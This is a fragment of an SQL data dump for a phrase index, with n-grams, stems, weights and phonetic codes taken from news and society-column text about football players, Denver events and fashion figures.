likely',0,1,1.6667,'V25424',1,'en'),(19244,'verification','verif',0,0,0.8,'V61235',1,'en'),(19245,'verification for','verif for',0,1,1.5333,'V6123516',1,'en'),(19246,'verification for the','verif for the',0,1,1.6667,'V61235163',1,'en'),(19247,'very well 7','veri well 7',0,1,1.3667,'V640',1,'en'),(19248,'vick','vick',0,0,0.2667,'V200',1,'en'),(19249,'vick and','vick and',0,1,1.2667,'V253',1,'en'),(19250,'vick and mornhinweg','vick and mornhinweg',0,1,1.6333,'V2535652',1,'en'),(19251,'victor','victor',0,0,0.4,'V236',1,'en'),(19252,'victor cruz','victor cruz',0,1,1.3667,'V236262',1,'en'),(19253,'victor cruz chooses','victor cruz chooses',0,1,1.6333,'V236262',1,'en'),(19254,'victor cruz made','victor cruz made',0,1,1.5333,'V23626253',1,'en'),(19255,'was 13','wa 13',0,1,1.2,'W200',1,'en'),(19256,'was 13 degrees','wa 13 degrees',0,1,1.4667,'W23262',1,'en'),(19257,'was called','wa called',0,1,1.3333,'W243',1,'en'),(19258,'was called on','wa called on',0,1,1.4333,'W2435',1,'en'),(19259,'was filmed','wa filmed',0,1,1.3333,'W21453',1,'en'),(19260,'was filmed last','wa filmed last',0,1,1.5,'W21453423',1,'en'),(19261,'was treated','wa treated',0,1,1.3667,'W2363',1,'en'),(19262,'was treated giants','wa treated giants',0,1,1.6,'W23632532',1,'en'),(19263,'wasn\'t afforded','wasn afforded',0,1,1.5,'W253163',1,'en'),(19264,'wasn\'t afforded that','wasn afforded that',0,1,1.6667,'W253163',1,'en'),(19265,'wednesday','wednesdai',0,0,0.6,'W3523',2,'en'),(19266,'wednesday that','wednesdai that',0,1,1.4667,'W3523',2,'en'),(19267,'wednesday that beyond','wednesdai that beyond',0,1,1.7,'W3523153',1,'en'),(19268,'week','week',0,0,0.2667,'W200',1,'en'),(19269,'week positive','week positive',0,1,1.4333,'W21231',1,'en'),(19270,'week positive thing','week positive thing',0,1,1.6333,'W21231352',1,'en'),(19271,'week to','week to',0,1,1.2333,'W230',1,'en'),(19272,'week to refine','week to refine',0,1,1.4667,'W23615',1,'en'),(19273,'well 7','well 7',0,1,1.2,'W400',1,'en'),(19274,'well 7 10','well 7 10',0,1,1.3,'W400',1,'en'),(19275,'well funny\'','well funny',0,1,1.3667,'W415',1,'en'),(19276,'well funny\' no','well funny no',0,1,1.4667,'W415',1,'en'),(19277,'what he','what he',0,1,1.2333,'W300',2,'en'),(19278,'what he heard','what he heard',0,1,1.4333,'W363',1,'en'),(19279,'who often','who often',0,1,1.3,'W135',1,'en'),(19280,'who often performs','who often performs',0,1,1.6,'W135161652',1,'en'),(19281,'who the','who the',0,1,1.2333,'W300',1,'en'),(19282,'who the jets','who the jets',0,1,1.4,'W3232',1,'en'),(19283,'will air','will air',0,1,1.2667,'W460',1,'en'),(19284,'will air before','will air before',0,1,1.5,'W4616',1,'en'),(19285,'wind','wind',0,0,0.2667,'W530',1,'en'),(19286,'wind chill','wind chill',0,1,1.3333,'W5324',1,'en'),(19287,'wind chill for','wind chill for',0,1,1.4667,'W532416',1,'en'),(19288,'wishes','wish',0,0,0.4,'W200',2,'en'),(19289,'wishes to','wish to',0,1,1.3,'W230',1,'en'),(19290,'wishes to be','wish to be',0,1,1.4,'W231',1,'en'),(19291,'with april','with april',0,1,1.3333,'W3164',1,'en'),(19292,'with april 26','with april 26',0,1,1.4333,'W3164',1,'en'),(19293,'with michael','with michael',0,1,1.4,'W3524',1,'en'),(19294,'with michael vick','with michael vick',0,1,1.5667,'W352412',1,'en'),(19295,'with the former','with the former',0,1,1.5,'W31656',1,'en'),(19296,'would probably','would probably',0,1,1.4667,'W431614',1,'en'),(19297,'would probably 7','would probably 7',0,1,1.5333,'W431614',1,'en'),(19298,'wouldn\'t','wouldn',0,0,0.5333,'W4353',1,'en'),(19299,'wouldn\'t have','wouldn have',0,1,1.4333,'W43531',1,'en'),(19300,'wouldn\'t have been','wouldn have been',0,1,1.6,'W435315',1,'en'),(19301,'www','www',0,0,0.2,'W000',5,'en'),(19302,'www ycol','www ycol',0,1,1.2667,'W240',3,'en'),(19303,'www ycol co','www ycol co',0,1,1.3667,'W242',3,'en'),(19304,'xlviii','xlviii',0,0,0.4,'X410',1,'en'),(19305,'xlviii on','xlviii on',0,1,1.3,'X415',1,'en'),(19306,'xlviii on sunday','xlviii on sunday',0,1,1.5333,'X415253',1,'en'),(19307,'ycol','ycol',0,0,0.2667,'Y240',3,'en'),(19308,'ycol co','ycol co',0,1,1.2333,'Y242',3,'en'),(19309,'ycol co uk','ycol co uk',0,1,1.3333,'Y242',3,'en'),(19310,'year','year',0,0,0.2667,'Y600',7,'en'),(19311,'year draft','year draft',0,1,1.3333,'Y63613',1,'en'),(19312,'year draft http','year draft http',0,1,1.5,'Y636131',1,'en'),(19313,'year old','year old',0,1,1.2667,'Y643',3,'en'),(19314,'year old receiver','year old receiver',0,1,1.5667,'Y6436216',1,'en'),(19315,'year option','year option',0,1,1.3667,'Y6135',1,'en'),(19316,'year option on','year option on',0,1,1.4667,'Y6135',1,'en'),(19317,'york square','york square',0,1,1.3667,'Y626',1,'en'),(19318,'york square park','york square park',0,1,1.5333,'Y626162',1,'en'),(19319,'you should take','you should take',0,1,1.5,'Y2432',1,'en'),(19320,'you to','you to',0,1,1.2,'Y300',3,'en'),(19321,'you to shoot','you to shoot',0,1,1.4,'Y323',1,'en'),(19322,'you\'re','you',0,0,0.4,'Y600',2,'en'),(19323,'you\'re long','you long',0,1,1.3667,'Y6452',1,'en'),(19324,'you\'re long saw','you long saw',0,1,1.5,'Y6452',1,'en'),(19325,'000','000',0,0,0.3,'',2,'en'),(19326,'000 ballots','000 ballots',0,1,1.3667,'B432',1,'en'),(19327,'000 ballots sun','000 ballots sun',0,1,1.5,'B4325',1,'en'),(19328,'1 700','1 700',0,1,1.1667,'',1,'en'),(19329,'1 700 males','1 700 males',0,1,1.3667,'M420',1,'en'),(19330,'11','11',0,0,0.2,'',4,'en'),(19331,'11 over','11 over',0,1,1.2333,'O160',1,'en'),(19332,'11 over the','11 over the',0,1,1.3667,'O163',1,'en'),(19333,'137','137',0,0,0.3,'',1,'en'),(19334,'1617','1617',0,0,0.4,'',1,'en'),(19335,'1617 wazee','1617 wazee',0,1,1.3333,'W200',1,'en'),(19336,'1617 wazee st','1617 wazee st',0,1,1.4333,'W230',1,'en'),(19337,'18','18',0,0,0.2,'',3,'en'),(19338,'18 associated','18 associated',0,1,1.4333,'A230',1,'en'),(19339,'18 associated with','18 associated with',0,1,1.6,'A230',1,'en'),(19340,'19','19',0,0,0.2,'',1,'en'),(19341,'19 wine','19 wine',0,1,1.2333,'W500',1,'en'),(19342,'19 wine event','19 wine event',0,1,1.4333,'W5153',1,'en'),(19343,'1991','1991',0,0,0.4,'',1,'en'),(19344,'1991 output','1991 output',0,1,1.3667,'O313',1,'en'),(19345,'1991 output of','1991 output of',0,1,1.4667,'O3131',1,'en'),(19346,'1996','1996',0,0,0.4,'',1,'en'),(19347,'1996 and','1996 and',0,1,1.2667,'A530',1,'en'),(19348,'1996 and she\'s','1996 and she',0,1,1.4667,'A532',1,'en'),(19349,'22','22',0,0,0.2,'',4,'en'),(19350,'22 26.may','22 26.may',0,1,1.3,'M000',1,'en'),(19351,'22 26.may 30','22 26.may 30',0,1,1.4,'M000',1,'en'),(19352,'22 denver','22 denver',0,1,1.3,'D516',1,'en'),(19353,'22 denver sister','22 denver sister',0,1,1.5333,'D516236',1,'en'),(19354,'26.may','26.mai',0,0,0.4,'M000',1,'en'),(19355,'26.may 30','26.mai 30',0,1,1.3,'M000',1,'en'),(19356,'26.may 30 is','26.mai 30 is',0,1,1.4,'M200',1,'en'),(19357,'30','30',0,0,0.2,'',2,'en'),(19358,'30 is','30 is',0,1,1.1667,'I200',1,'en'),(19359,'30 is pierre','30 is pierre',0,1,1.4,'I216',1,'en'),(19360,'55','55',0,0,0.2,'',1,'en'),(19361,'55 000','55 000',0,1,1.2,'',1,'en'),(19362,'55 000 ballots','55 000 ballots',0,1,1.4667,'B432',1,'en'),(19363,'700','700',0,0,0.3,'',1,'en'),(19364,'700 males','700 males',0,1,1.3,'M420',1,'en'),(19365,'700 males nominees','700 males nominees',0,1,1.6,'M4252',1,'en'),(19366,'a blind','a blind',0,1,1.2333,'A1453',1,'en'),(19367,'a blind tazo','a blind tazo',0,1,1.4,'A14532',1,'en'),(19368,'a bronze','a bronze',0,1,1.2667,'A1652',1,'en'),(19369,'a bronze in','a bronze in',0,1,1.3667,'A16525',1,'en'),(19370,'a diane','a diane',0,1,1.2333,'A350',1,'en'),(19371,'a diane at','a diane at',0,1,1.3333,'A353',1,'en'),(19372,'a doorway','a doorway',0,1,1.3,'A360',1,'en'),(19373,'a doorway but','a doorway but',0,1,1.4333,'A3613',1,'en'),(19374,'a great','a great',0,1,1.2333,'A263',4,'en'),(19375,'a great other','a great other',0,1,1.4333,'A2636',1,'en'),(19376,'a great place','a great place',0,1,1.4333,'A263142',1,'en'),(19377,'a introduce','a introduce',0,1,1.3667,'A53632',1,'en'),(19378,'a introduce sun','a introduce sun',0,1,1.5,'A536325',1,'en'),(19379,'a naked','a naked',0,1,1.2333,'A523',1,'en'),(19380,'a naked dinner','a naked dinner',0,1,1.4667,'A52356',1,'en'),(19381,'a one','a one',0,1,1.1667,'A500',2,'en'),(19382,'a one night','a one night',0,1,1.3667,'A523',1,'en'),(19383,'a return','a return',0,1,1.2667,'A6365',1,'en'),(19384,'a return bridal','a return bridal',0,1,1.5,'A63651634',1,'en'),(19385,'a rundown','a rundown',0,1,1.3,'A6535',1,'en'),(19386,'a rundown hotel','a rundown hotel',0,1,1.5,'A653534',1,'en'),(19387,'a stroll','a stroll',0,1,1.2667,'A2364',1,'en'),(19388,'a stroll on','a stroll on',0,1,1.3667,'A23645',1,'en'),(19389,'a supernumerary','a supernumerary',0,1,1.5,'A21656',1,'en'),(19390,'a supernumerary in','a supernumerary in',0,1,1.6,'A216565',1,'en'),(19391,'a walk','a walk',0,1,1.2,'A420',1,'en'),(19392,'a walk on','a walk on',0,1,1.3,'A425',1,'en'),(19393,'a\'s','a',0,0,0.2,'A200',1,'en'),(19394,'a\'s pictorials','a pictorials',0,1,1.4667,'A2123642',1,'en'),(19395,'a\'s pictorials at','a pictorials at',0,1,1.5667,'A21236423',1,'en'),(19396,'able to utter','abl to utter',0,1,1.4333,'A1436',1,'en'),(19397,'about a','about a',0,1,1.2333,'A130',2,'en'),(19398,'about a rundown','about a rundown',0,1,1.5,'A136535',1,'en'),(19399,'account','account',0,0,0.4667,'A253',3,'en'),(19400,'account that','account that',0,1,1.4,'A253',1,'en'),(19401,'account that we','account that we',0,1,1.5,'A253',1,'en'),(19402,'accounts receivable','account receivable',0,1,1.6333,'A25326214',1,'en'),(19403,'accounts receivable its','account receivable its',0,1,1.7667,'A2532621432',1,'en'),(19404,'ace','ac',0,0,0.2,'A200',1,'en'),(19405,'ace archer','ac archer',0,1,1.3333,'A2626',1,'en'),(19406,'ace archer and','ac archer and',0,1,1.4667,'A262653',1,'en'),(19407,'ace archer needs','ac archer needs',0,1,1.5333,'A2626532',1,'en'),(19408,'achieved','achiev',0,0,0.5333,'A213',3,'en'),(19409,'achieved lauren\'s','achiev lauren',0,1,1.5667,'A2134652',1,'en'),(19410,'achieved lauren\'s the','achiev lauren the',0,1,1.7,'A21346523',1,'en'),(19411,'actor','actor',0,0,0.3333,'A236',2,'en'),(19412,'actor pam','actor pam',0,1,1.3,'A23615',1,'en'),(19413,'actor pam clifton','actor pam clifton',0,1,1.5667,'A2361524135',1,'en'),(19414,'ads','ad',0,0,0.2,'A320',1,'en'),(19415,'ads by','ad by',0,1,1.2,'A321',1,'en'),(19416,'ads by using','ad by using',0,1,1.4,'A321252',1,'en'),(19417,'ads will','ad will',0,1,1.2667,'A324',1,'en'),(19418,'ads will start','ad will start',0,1,1.4667,'A3242363',1,'en'),(19419,'again','again',0,0,0.3333,'A250',4,'en'),(19420,'again heading','again heading',0,1,1.4333,'A25352',1,'en'),(19421,'again heading towards','again heading towards',0,1,1.7,'A253523632',1,'en'),(19422,'alive','aliv',0,0,0.3333,'A410',1,'en'),(19423,'alive from','aliv from',0,1,1.3333,'A4165',1,'en'),(19424,'alive from easily','aliv from easily',0,1,1.5667,'A416524',1,'en'),(19425,'all-vegetable','all-veget',0,0,0.8667,'A412314',1,'en'),(19426,'all-vegetable alive','all-veget alive',0,1,1.6333,'A4123141',1,'en'),(19427,'all-vegetable alive from','all-veget alive from',0,1,1.8,'A412314165',1,'en'),(19428,'also known','also known',0,1,1.3333,'A425',1,'en'),(19429,'also known as','also known as',0,1,1.4333,'A4252',1,'en'),(19430,'an ace','an ace',0,1,1.2,'A520',1,'en'),(19431,'an ace archer','an ace archer',0,1,1.4333,'A52626',1,'en'),(19432,'and 55','and 55',0,1,1.2,'A530',1,'en'),(19433,'and 55 000','and 55 000',0,1,1.3333,'A530',1,'en'),(19434,'and a great','and a great',0,1,1.3667,'A53263',1,'en'),(19435,'and ann','and ann',0,1,1.2333,'A535',1,'en'),(19436,'and ann kiely','and ann kiely',0,1,1.4333,'A53524',1,'en'),(19437,'and armoire','and armoire',0,1,1.3667,'A53656',1,'en'),(19438,'and armoire blind','and armoire blind',0,1,1.5667,'A536561453',1,'en'),(19439,'and disrobed','and disrobed',0,1,1.4,'A532613',1,'en'),(19440,'and disrobed that\'s','and disrobed that',0,1,1.6333,'A5326132',1,'en'),(19441,'and ends','and ends',0,1,1.2667,'A53532',1,'en'),(19442,'and ends aug.13','and ends aug.13',0,1,1.5,'A53532',1,'en'),(19443,'and i gamed','and i gamed',0,1,1.3667,'A53253',1,'en'),(19444,'and i was','and i was',0,1,1.3,'A532',1,'en'),(19445,'and it\'s fair','and it fair',0,1,1.4333,'A53216',1,'en'),(19446,'and its off','and its off',0,1,1.3667,'A5321',1,'en'),(19447,'and lowering','and lowering',0,1,1.4,'A534652',1,'en'),(19448,'and lowering ceremony','and lowering ceremony',0,1,1.7,'A53465265',1,'en'),(19449,'and out','and out',0,1,1.2333,'A530',1,'en'),(19450,'and out of','and out of',0,1,1.3333,'A531',1,'en'),(19451,'and poor','and poor',0,1,1.2667,'A5316',1,'en'),(19452,'and poor and','and poor and',0,1,1.4,'A531653',1,'en'),(19453,'and ralph','and ralph',0,1,1.3,'A53641',2,'en'),(19454,'and ralph lauren\'s','and ralph lauren',0,1,1.6,'A536414652',1,'en'),(19455,'and return','and return',0,1,1.3333,'A536365',1,'en'),(19456,'and return to','and return to',0,1,1.4333,'A5363653',1,'en'),(19457,'and same','and same',0,1,1.2667,'A5325',1,'en'),(19458,'and same goes','and same goes',0,1,1.4333,'A53252',1,'en'),(19459,'and she\'s','and she',0,1,1.3,'A532',1,'en'),(19460,'and she\'s recently','and she recently',0,1,1.6,'A53262534',1,'en'),(19461,'and stay','and stay',0,1,1.2667,'A5323',1,'en'),(19462,'and stay at','and stay at',0,1,1.3667,'A5323',1,'en'),(19463,'and tammy','and tammy',0,1,1.3,'A535',1,'en'),(19464,'and tammy cunningham','and tammy cunningham',0,1,1.6667,'A5352525',1,'en'),(19465,'and the gold','and the gold',0,1,1.4,'A53243',1,'en'),(19466,'and the red','and the red',0,1,1.3667,'A5363',1,'en'),(19467,'and was','and was',0,1,1.2333,'A532',3,'en'),(19468,'and was chosen','and was chosen',0,1,1.4667,'A5325',1,'en'),(19469,'animals','anim',0,0,0.4667,'A542',1,'en'),(19470,'animals recently','anim recently',0,1,1.5333,'A54262534',1,'en'),(19471,'animals recently on','anim recently on',0,1,1.6333,'A542625345',1,'en'),(19472,'ann','ann',0,0,0.2,'A500',1,'en'),(19473,'ann kiely','ann kiely',0,1,1.3,'A524',1,'en'),(19474,'ann kiely and','ann kiely and',0,1,1.4333,'A52453',1,'en'),(19475,'announcing','announc',0,0,0.6667,'A5252',1,'en'),(19476,'announcing the','announc the',0,1,1.4667,'A52523',1,'en'),(19477,'announcing the appearance','announc the appearance',0,1,1.8333,'A525231652',1,'en'),(19478,'appearance','appear',0,0,0.6667,'A1652',2,'en'),(19479,'appearance of','appear of',0,1,1.4333,'A16521',2,'en'),(19480,'appearance of someone','appear of someone',0,1,1.7,'A1652125',1,'en'),(19481,'appearing','appear',0,0,0.6,'A1652',1,'en'),(19482,'appearing this','appear this',0,1,1.4667,'A165232',1,'en'),(19483,'appearing this month','appear this month',0,1,1.6667,'A16523253',1,'en'),(19484,'archer','archer',0,0,0.4,'A626',1,'en'),(19485,'archer and','archer and',0,1,1.3333,'A62653',1,'en'),(19486,'archer and was','archer and was',0,1,1.4667,'A626532',1,'en'),(19487,'archer needs','archer needs',0,1,1.4,'A626532',1,'en'),(19488,'archer needs her','archer needs her',0,1,1.5333,'A6265326',1,'en'),(19489,'armoire','armoir',0,0,0.4667,'A656',1,'en'),(19490,'armoire blind','armoir blind',0,1,1.4333,'A6561453',1,'en'),(19491,'armoire blind and','armoir blind and',0,1,1.5667,'A656145353',1,'en'),(19492,'as a supernumerary','as a supernumerary',0,1,1.6,'A21656',1,'en'),(19493,'as skiddles','as skiddles',0,1,1.3667,'A2342',1,'en'),(19494,'as skiddles the','as skiddles the',0,1,1.5,'A23423',1,'en'),(19495,'as the play','as the play',0,1,1.3667,'A2314',1,'en'),(19496,'as you','as you',0,1,1.2,'A200',1,'en'),(19497,'as you pair','as you pair',0,1,1.3667,'A216',1,'en'),(19498,'ashton','ashton',0,0,0.4,'A235',1,'en'),(19499,'ashton can\'t','ashton can',0,1,1.4,'A235253',1,'en'),(19500,'ashton can\'t produce','ashton can produce',0,1,1.6667,'A2352531632',1,'en'),(19501,'ashton\'s','ashton',0,0,0.5333,'A2352',1,'en'),(19502,'ashton\'s legendary','ashton legendary',0,1,1.6,'A235242536',1,'en'),(19503,'ashton\'s legendary 1991','ashton legendary 1991',0,1,1.7667,'A235242536',1,'en'),(19504,'aspen','aspen',0,0,0.3333,'A215',1,'en'),(19505,'aspen lit','aspen lit',0,1,1.3,'A21543',1,'en'),(19506,'aspen lit competition','aspen lit competition',0,1,1.7,'A2154325135',1,'en'),(19507,'associated','associ',0,0,0.6667,'A230',1,'en'),(19508,'associated with','associ with',0,1,1.5,'A230',1,'en'),(19509,'associated with aug.23','associ with aug.23',0,1,1.7333,'A232',1,'en'),(19510,'at 1617','at 1617',0,1,1.2333,'A300',1,'en'),(19511,'at 1617 wazee','at 1617 wazee',0,1,1.4333,'A320',1,'en'),(19512,'at challenges','at challenges',0,1,1.4333,'A32452',1,'en'),(19513,'at challenges elway\'s','at challenges elway',0,1,1.7,'A3245242',1,'en'),(19514,'at her','at her',0,1,1.2,'A360',2,'en'),(19515,'at her or','at her or',0,1,1.3,'A360',1,'en'),(19516,'at solera','at solera',0,1,1.3,'A3246',1,'en'),(19517,'at solera on','at solera on',0,1,1.4,'A32465',1,'en'),(19518,'at the barth','at the barth',0,1,1.4,'A3163',1,'en'),(19519,'at the hot','at the hot',0,1,1.3333,'A300',1,'en'),(19520,'at the may','at the may',0,1,1.3333,'A350',1,'en'),(19521,'at thursday\'s','at thursday',0,1,1.4333,'A36232',1,'en'),(19522,'at thursday\'s eating','at thursday eating',0,1,1.6667,'A36232352',1,'en'),(19523,'aug.13','aug.13',0,0,0.4,'A200',1,'en'),(19524,'aug.13 with','aug.13 with',0,1,1.3667,'A230',1,'en'),(19525,'aug.13 with a','aug.13 with a',0,1,1.4333,'A230',1,'en'),(19526,'aug.23','aug.23',0,0,0.4,'A200',1,'en'),(19527,'aug.23 ashton','aug.23 ashton',0,1,1.4333,'A235',1,'en'),(19528,'aug.23 ashton can\'t','aug.23 ashton can',0,1,1.6333,'A235253',1,'en'),(19529,'back from','back from',0,1,1.3,'B2165',1,'en'),(19530,'back from the','back from the',0,1,1.4333,'B21653',1,'en'),(19531,'back home','back home',0,1,1.3,'B250',1,'en'),(19532,'back home with','back home with',0,1,1.4667,'B253',1,'en'),(19533,'balloons','balloon',0,0,0.5333,'B452',1,'en'),(19534,'balloons silver','balloon silver',0,1,1.5,'B452416',1,'en'),(19535,'balloons silver in','balloon silver in',0,1,1.6,'B4524165',1,'en'),(19536,'ballots','ballot',0,0,0.4667,'B432',1,'en'),(19537,'ballots sun','ballot sun',0,1,1.3667,'B4325',1,'en'),(19538,'ballots sun is','ballot sun is',0,1,1.4667,'B43252',1,'en'),(19539,'baltimore','baltimor',0,0,0.6,'B4356',2,'en'),(19540,'baltimore the','baltimor the',0,1,1.4333,'B43563',1,'en'),(19541,'baltimore the toy','baltimor the toy',0,1,1.5667,'B43563',1,'en'),(19542,'barth','barth',0,0,0.3333,'B630',1,'en'),(19543,'barth hotel','barth hotel',0,1,1.3667,'B634',1,'en'),(19544,'barth hotel in','barth hotel in',0,1,1.4667,'B6345',1,'en'),(19545,'barth hotel july','barth hotel july',0,1,1.5333,'B63424',1,'en'),(19546,'barth hotel the','barth hotel the',0,1,1.5,'B6343',1,'en'),(19547,'be blind','be blind',0,1,1.2667,'B453',1,'en'),(19548,'be blind as','be blind as',0,1,1.3667,'B4532',1,'en'),(19549,'be exquisite','be exquisite',0,1,1.4,'B230',1,'en'),(19550,'be exquisite one','be exquisite one',0,1,1.5333,'B235',1,'en'),(19551,'be honored','be honored',0,1,1.3333,'B563',1,'en'),(19552,'be honored at','be honored at',0,1,1.4333,'B563',1,'en'),(19553,'beat','beat',0,0,0.2667,'B300',2,'en'),(19554,'beat mezcal','beat mezcal',0,1,1.3667,'B3524',1,'en'),(19555,'beat mezcal at','beat mezcal at',0,1,1.4667,'B35243',1,'en'),(19556,'beaten','beaten',0,0,0.4,'B350',1,'en'),(19557,'beaten track','beaten track',0,1,1.4,'B35362',1,'en'),(19558,'beaten track residents','beaten track residents',0,1,1.7333,'B35362623532',1,'en'),(19559,'been on','been on',0,1,1.2333,'B500',1,'en'),(19560,'been on stage','been on stage',0,1,1.4333,'B5232',1,'en'),(19561,'been slapping','been slapping',0,1,1.4333,'B524152',1,'en'),(19562,'been slapping on','been slapping on',0,1,1.5333,'B5241525',1,'en'),(19563,'before i','befor i',0,1,1.2667,'B600',1,'en'),(19564,'before i was','befor i was',0,1,1.4,'B620',1,'en'),(19565,'blind','blind',0,0,0.3333,'B453',1,'en'),(19566,'blind and','blind and',0,1,1.3,'B45353',1,'en'),(19567,'blind and disrobed','blind and disrobed',0,1,1.6,'B453532613',1,'en'),(19568,'blind as','blind as',0,1,1.2667,'B4532',1,'en'),(19569,'blind as you','blind as you',0,1,1.4,'B4532',1,'en'),(19570,'blind tazo','blind tazo',0,1,1.3333,'B4532',1,'en'),(19571,'blind tazo tea','blind tazo tea',0,1,1.4667,'B45323',1,'en'),(19572,'blindfolded','blindfold',0,0,0.7333,'B453143',1,'en'),(19573,'blindfolded not','blindfold not',0,1,1.5,'B45314353',1,'en'),(19574,'blindfolded not sure','blindfold not sure',0,1,1.6667,'B4531435326',1,'en'),(19575,'bold','bold',0,0,0.2667,'B430',1,'en'),(19576,'bold names','bold names',0,1,1.3333,'B4352',1,'en'),(19577,'bold names stay','bold names stay',0,1,1.5,'B43523',1,'en'),(19578,'bottles','bottl',0,0,0.4667,'B342',1,'en'),(19579,'bottles to','bottl to',0,1,1.3333,'B3423',1,'en'),(19580,'bottles to get','bottl to get',0,1,1.4667,'B342323',1,'en'),(19581,'boulder','boulder',0,0,0.4667,'B436',1,'en'),(19582,'boulder student','boulder student',0,1,1.5,'B4362353',1,'en'),(19583,'boulder student leonard','boulder student leonard',0,1,1.7667,'B43623534563',1,'en'),(19584,'bow','bow',0,0,0.2,'B000',1,'en'),(19585,'bow with','bow with',0,1,1.2667,'B300',1,'en'),(19586,'bow with ralph','bow with ralph',0,1,1.4667,'B3641',1,'en'),(19587,'bridal','bridal',0,0,0.4,'B634',2,'en'),(19588,'bridal tambien','bridal tambien',0,1,1.4667,'B6343515',1,'en'),(19589,'bridal tambien with','bridal tambien with',0,1,1.6333,'B63435153',1,'en'),(19590,'bronze','bronz',0,0,0.4,'B652',1,'en'),(19591,'bronze in','bronz in',0,1,1.3,'B6525',1,'en'),(19592,'bronze in knowledgeable','bronz in knowledgeable',0,1,1.7667,'B65252543214',1,'en'),(19593,'buena','buena',0,0,0.3333,'B500',1,'en'),(19594,'buena vista','buena vista',0,1,1.3667,'B5123',1,'en'),(19595,'buena vista fla','buena vista fla',0,1,1.5,'B512314',1,'en'),(19596,'business pages 8','busi pages 8',0,1,1.5333,'B25212',1,'en'),(19597,'but give','but give',0,1,1.2667,'B321',1,'en'),(19598,'but give up','but give up',0,1,1.3667,'B321',1,'en'),(19599,'but he\'ll','but he',0,1,1.3,'B340',1,'en'),(19600,'but he\'ll do','but he do',0,1,1.4,'B343',1,'en'),(19601,'but she','but she',0,1,1.2333,'B320',1,'en'),(19602,'but she achieved','but she achieved',0,1,1.5333,'B3213',1,'en'),(19603,'by lauren','by lauren',0,1,1.3,'B465',1,'en'),(19604,'by lauren to','by lauren to',0,1,1.4,'B4653',1,'en'),(19605,'by using','by using',0,1,1.2667,'B252',1,'en'),(19606,'by using three','by using three',0,1,1.4667,'B25236',1,'en'),(19607,'can hot','can hot',0,1,1.2333,'C530',1,'en'),(19608,'can hot l','can hot l',0,1,1.3,'C534',1,'en'),(19609,'can\'t','can',0,0,0.3333,'C530',3,'en'),(19610,'can\'t produce','can produce',0,1,1.4333,'C531632',1,'en'),(19611,'can\'t produce the','can produce the',0,1,1.5667,'C5316323',1,'en'),(19612,'celebrity','celebr',0,0,0.6,'C4163',1,'en'),(19613,'celebrity style','celebr style',0,1,1.5,'C4163234',1,'en'),(19614,'celebrity style tip','celebr style tip',0,1,1.6333,'C416323431',1,'en'),(19615,'ceremony','ceremoni',0,0,0.5333,'C650',1,'en'),(19616,'ceremony uniforms','ceremoni uniforms',0,1,1.5667,'C651652',1,'en'),(19617,'ceremony uniforms she','ceremoni uniforms she',0,1,1.7,'C651652',1,'en'),(19618,'challenges','challeng',0,0,0.6667,'C452',1,'en'),(19619,'challenges elway\'s','challeng elway',0,1,1.6,'C45242',1,'en'),(19620,'challenges elway\'s summer','challeng elway summer',0,1,1.8333,'C4524256',1,'en'),(19621,'chosen','chosen',0,0,0.4,'C500',1,'en'),(19622,'chosen by','chosen by',0,1,1.3,'C510',1,'en'),(19623,'chosen by lauren','chosen by lauren',0,1,1.5333,'C51465',1,'en'),(19624,'cities','citi',0,0,0.4,'C320',1,'en'),(19625,'cities essential','citi essential',0,1,1.5333,'C32534',1,'en'),(19626,'cities essential dinner','citi essential dinner',0,1,1.7667,'C32534356',1,'en'),(19627,'city','citi',0,0,0.2667,'C300',2,'en'),(19628,'city internal','citi internal',0,1,1.4333,'C353654',1,'en'),(19629,'city internal go','citi internal go',0,1,1.5333,'C3536542',1,'en'),(19630,'city realtor','citi realtor',0,1,1.4,'C36436',1,'en'),(19631,'city realtor judy','citi realtor judy',0,1,1.5667,'C3643623',1,'en'),(19632,'clean','clean',0,0,0.3333,'C450',2,'en'),(19633,'clean joy','clean joy',0,1,1.3,'C452',1,'en'),(19634,'clean joy fahrenkrog','clean joy fahrenkrog',0,1,1.6667,'C452165262',1,'en'),(19635,'clifton','clifton',0,0,0.4667,'C4135',1,'en'),(19636,'clifton had','clifton had',0,1,1.3667,'C41353',1,'en'),(19637,'clifton had me','clifton had me',0,1,1.4667,'C413535',1,'en'),(19638,'clown','clown',0,0,0.3333,'C450',1,'en'),(19639,'clown coming','clown coming',0,1,1.4,'C45252',1,'en'),(19640,'clown coming back','clown coming back',0,1,1.5667,'C4525212',1,'en'),(19641,'clown connections','clown connections',0,1,1.5667,'C45252352',1,'en'),(19642,'clown connections convention','clown connections convention',0,1,1.9333,'C4525235251535',1,'en'),(19643,'clown molly','clown molly',0,1,1.3667,'C454',1,'en'),(19644,'clown molly kleeman','clown molly kleeman',0,1,1.6333,'C454245',1,'en'),(19645,'clown she\'s','clown she',0,1,1.3667,'C452',1,'en'),(19646,'clown she\'s been','clown she been',0,1,1.5333,'C45215',1,'en'),(19647,'co uk up','co uk up',0,1,1.2667,'C100',1,'en'),(19648,'colorado','colorado',0,0,0.5333,'C463',1,'en'),(19649,'colorado i','colorado i',0,1,1.3333,'C463',1,'en'),(19650,'colorado i have','colorado i have',0,1,1.5,'C4631',1,'en'),(19651,'colorado\'s','colorado',0,0,0.6667,'C4632',1,'en'),(19652,'colorado\'s stop','colorado stop',0,1,1.5,'C463231',1,'en'),(19653,'colorado\'s stop working','colorado stop working',0,1,1.7667,'C4632316252',1,'en'),(19654,'comely','come',0,0,0.4,'C540',1,'en'),(19655,'comely company','come company',0,1,1.4667,'C542515',1,'en'),(19656,'comely company joy','come company joy',0,1,1.6,'C5425152',1,'en'),(19657,'coming','come',0,0,0.4,'C520',3,'en'),(19658,'coming back','come back',0,1,1.3667,'C5212',2,'en'),(19659,'coming back home','come back home',0,1,1.5333,'C52125',1,'en'),(19660,'coming revival','come revival',0,1,1.4667,'C52614',1,'en'),(19661,'coming revival of','come revival of',0,1,1.5667,'C526141',1,'en'),(19662,'commercial remember','commerci remember',0,1,1.6333,'C56246516',1,'en'),(19663,'commercial remember not','commerci remember not',0,1,1.7667,'C5624651653',1,'en'),(19664,'company joy','compani joy',0,1,1.3667,'C5152',1,'en'),(19665,'company joy is','compani joy is',0,1,1.4667,'C5152',1,'en'),(19666,'competition june','competit june',0,1,1.5333,'C513525',1,'en'),(19667,'competition june 22','competit june 22',0,1,1.6333,'C513525',1,'en'),(19668,'connections','connect',0,0,0.7333,'C52352',2,'en'),(19669,'connections convention','connect convention',0,1,1.7333,'C5235251535',1,'en'),(19670,'connections convention in','connect convention in',0,1,1.8333,'C5235251535',1,'en'),(19671,'convention','convent',0,0,0.6667,'C51535',1,'en'),(19672,'convention in','convent 